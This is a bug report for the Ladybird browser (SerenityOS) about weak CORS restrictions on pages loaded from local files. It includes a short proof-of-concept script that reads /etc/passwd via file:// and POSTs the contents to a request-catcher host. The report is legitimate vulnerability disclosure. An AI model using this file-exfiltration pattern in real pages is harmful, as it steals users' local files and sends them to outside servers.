Ladybird: CORS lockdown on local file not strict enough
0
π
0Running the following code with Ladybird from a local file will happely send any file the user has access to, to a remote server. The allowed protocol should be changed to only http and https like it is already the case if loading this script from remote. This would match Firefox behaviour.
<script>
fetch("file:///etc/passwd")
.then((res) => res.text())
.then((text) => {
let xhr = new XMLHttpRequest();
xhr.open("POST", "https://serenity.requestcatcher.com/test", true);
xhr.send(text);
})
.catch((e) => console.error(e));
</script>
SerenityOSΒ /Β serenity
The Serenity Operating System π
30.6k
Contributors get 100% of received funds after fees
How does funding with Polar work?
1
Pay now to fund the work behind this issue.
2
Get updates on progress being made.
3
Maintainer is rewarded once the issue is completed.
FAQ
Backer
You're funding impactful open source efforts
Contributor
You want to contribute to this effort
Maintainer
You want to get funding like this too